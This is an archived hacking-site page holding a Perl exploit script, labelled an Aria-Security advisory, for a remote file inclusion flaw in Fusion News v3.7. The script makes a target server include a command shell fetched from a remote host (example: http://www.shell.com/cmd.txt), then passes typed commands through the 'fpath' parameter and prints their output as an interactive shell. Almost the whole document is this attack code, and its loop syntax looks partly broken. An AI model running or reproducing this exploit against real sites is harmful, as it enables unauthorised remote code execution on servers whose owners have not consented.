AOH :: HP Unsorted F :: B06-4278.HTM

fusionnews 3,7 Remote File Inclusion



fusionnews 3,7 Remote File Inclusion
fusionnews 3,7 Remote File Inclusion



#!/usr/bin/perl
        ###########################################################################################
        #                       Aria-Security.net Advisory                                                                                                                                                           #
        #                       Discovered  by: OUTLAW                                                                                                                                                                 #
#                       < www.Aria-security.net >                                                                                                             #
        #               Gr33t to: A.u.r.a  & HessamX & Cl0wn & DrtRp                                                                                                                              #
        #                 Special Thanx To All Aria-Security Users                                                                                                                                       #
        ###########################################################################################

use LWP::UserAgent;
print "\n === Fusion News v3.7 Remote File Inclusion\n";
print "\n === Discovered by OutLaw .\n";
print "\n === www.Aria-Security.Net\n";

$bPath = $ARGV[0];
$cmdo = $ARGV[1];
$bcmd = $ARGV[2];

if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}



while()
{
       print "[Shell] \$";
while()
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$bpath.'index.php?fpath='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n Could not connect !\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[=EA]/;
if (!$cmd) {print "\nPlease type a Command\n\n"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request failed!/)
       {print "\n Could Not Connect to cmd Host\n";exit}
elsif ($return =~/^Fatal.error/) {print "\n Invalid Command\n"}
if($return =~ /(.*)/)
{
       $freturn = $1;
       $freturn=~ tr/[=EA]/[\n]/;
       print "\r\n$freturn\n\r";
       last;
}

else {print "[Shell] \$";}}}last;

sub usage()
 {
print " Usage : fusion.pl [host] [cmd shell location] [cmd shell variable]\n";
print " Example : fusion.pl http://fusionnews.com http://www.shell.com/cmd.txt cmd\n";
 exit();
 }


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.